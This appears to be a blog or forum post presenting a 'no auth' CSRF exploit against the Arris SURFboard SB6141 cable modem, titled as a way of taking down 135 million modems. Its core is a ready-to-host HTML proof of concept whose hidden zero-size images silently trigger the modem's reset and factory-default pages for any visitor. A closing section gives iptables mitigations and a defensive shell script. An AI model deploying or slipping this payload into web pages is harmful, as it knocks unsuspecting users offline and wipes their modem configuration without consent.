Taking down 135 million modems, NO AUTH CSRF RESET EXPLOIT (Super simple!)

ARRIS (formerly Motorola) SURFboard modems are highly popular broadband cable modems with a reputation for reliability. The SB6141 model in particular can be found for around $70 US, is capable of supporting well over 150 megabit speeds, and works with all the major US Internet providers. According to ARRIS’ documentation, the SB6141 is the world’s most popular cable modem with over 135 million in production.

Vendor : Motorola

Website : http://www.surfboard.com/products/sb6141/

Affected firmware : SB_KOMODO-1.0.6.14-SCM01-NOSH

Here is the proof-of-concept code for a remote modem reset, and it's super easy!

Arris SURFboard SB6141 NO AUTH and CSRF RESET EXPLOIT
[*] Vulnerability found by : David Longenecker
[*] Exploit by : M U Suraj($r00t)

<!DOCTYPE html>

<html>
  <head>
    <title>
      Arris RESET
    </title>
  </head>
  <body>
    <h1 style="color:dodgerblue;font-family:consolas;">Arris SURFboard SB6141 NO AUTH RESET CSRF EXPLOIT</h1>
    <u style="font-family:consolas;">Created by Suraj($r00t)</u>
    <img src="http://192.168.100.1/reset.htm" style="width:0px;height:0px;">

    <img src="http://192.168.100.1/cmConfigData.htm?BUTTON_INPUT1=Reset+All+Defaults" style="width:0px;height:0px;">
  </body>
</html>

 

Easy Patches

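  1. Add iptables rules on the router to drop forwarded packets destined for 192.168.100.1, with an exception for a trusted source address x.x.x.x (iptables -I FORWARD -d 192.168.100.1 -j DROP, iptables -I FORWARD -s x.x.x.x -d 192.168.100.1 -j ACCEPT). Because -I inserts at the top of the chain, the ACCEPT rule added second is evaluated before the DROP.
  2. Wait for the security update, which may add UI authentication and CSRF protection.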
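
The two iptables rules from item 1, as an added example that is not part of the original post: a script that validates the trusted address and can be re-run without stacking duplicate rules. The function names (`valid_ipv4`, `ensure_rule`, `protect_modem`) and the `IPT` override are assumptions made for this example.

```shell
#!/bin/sh
# Added example: repeatable form of the two FORWARD rules from item 1.
# Function names and the IPT override are assumptions, not from the post.
MODEM_IP="192.168.100.1"      # modem admin address given in the post
IPT="${IPT:-iptables}"        # point at a stub for a dry run

# Accept only a dotted quad with every octet in 0-255.
valid_ipv4() {
  case "$1" in
    ""|*[!0-9.]*|*..*|.*|*.) return 1 ;;
  esac
  old_ifs=$IFS; IFS=.
  set -- $1
  IFS=$old_ifs
  [ "$#" -eq 4 ] || return 1
  for octet in "$@"; do
    [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
  done
}

# Insert a rule at the top of FORWARD unless an identical one exists.
ensure_rule() {
  if ! $IPT -C FORWARD "$@" 2>/dev/null; then
    $IPT -I FORWARD 1 "$@"
  fi
}

# Usage: protect_modem <trusted admin IPv4 on the LAN>
protect_modem() {
  admin="$1"
  if ! valid_ipv4 "$admin"; then
    echo "invalid admin address: $admin" >&2
    return 2
  fi
  ensure_rule -d "$MODEM_IP" -j DROP
  # Re-seat the exception so it always sits above the blanket DROP,
  # even if an older ACCEPT rule was already somewhere in the chain.
  $IPT -D FORWARD -s "$admin" -d "$MODEM_IP" -j ACCEPT 2>/dev/null || true
  $IPT -I FORWARD 1 -s "$admin" -d "$MODEM_IP" -j ACCEPT
}
```

Run `protect_modem` as root on the router that forwards LAN traffic to the modem. Rules added this way are lost on reboot unless they are saved with the platform's usual persistence mechanism.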

 
